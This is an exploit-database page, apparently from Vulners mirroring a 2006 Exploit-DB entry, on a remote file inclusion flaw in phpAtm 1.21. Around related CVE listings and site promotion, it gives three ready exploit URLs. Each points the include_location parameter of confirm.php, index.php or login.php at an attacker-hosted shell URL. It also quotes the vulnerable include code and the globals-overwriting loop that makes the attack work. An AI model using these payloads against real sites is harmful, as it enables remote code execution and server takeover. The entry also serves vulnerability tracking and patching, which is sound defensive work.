Lucene search
+L

phpAtm 1.21 - 'include_location' Remote File Inclusion

🗓️ 30 Aug 2006 00:00:00Reported by KinSizeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 48 Views

phpAtm v1.21 Remote File Inclusion Exploit from include_locatio

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-4594
6 Sep 200622:00
cve
cve
CVE
CVE-2006-4749
13 Sep 200622:00
cve
cvelist
Cvelist
CVE-2006-4594
6 Sep 200622:00
cvelist
cvelist
Cvelist
CVE-2006-4749
13 Sep 200622:00
cvelist
euvd
EUVD
EUVD-2006-4582
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2006-4736
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-4594
6 Sep 200622:04
nvd
nvd
NVD
CVE-2006-4749
13 Sep 200622:07
nvd
########################################################################
#  phpAtm <= v1.21 (include_location) Remote File Inclusion Exploit
#
#   Level : Dangerous
#   Download  : http://phpatm.free.fr/
#   Version : v1.21
#
#                           Found By: KinSize [MHG Security Team]
#
########################################################################
# Code :   include($include_location.'include/conf.php');
#
#  exploit:
# http://www.sitename.com/[script_path]/confirm.php?include_location=http://shellurl.com ?
# http://www.sitename.com/[script_path]/index.php?include_location=http://shellurl.com ?
# http://www.sitename.com/[script_path]/login.php?include_location=http://shellurl.com ?
########################################################################
#
#Conatact : nefretaskimdir[at]gmail.com
#
# GreetZ : Damage-N | by_emr3  | by_OkSit  | ESKOBAR  | Ye.iL  | PowerCobra  | sys-worm(Turkish)| Z e b e r u S | ALL Turkish & MusLim
########################################################################

Added information:

At first glance this doesn't look vulnerable but then again:

line 85-94 of common.php
while (list(, $arr) = each($sysarr))
{
        if (is_array($arr))
        {
                while (list($key, $value) = each($arr))
                {
                        $GLOBALS[$key] = $value;
                }
        }
}

/str0ke

# milw0rm.com [2006-08-30]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Aug 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.0249
48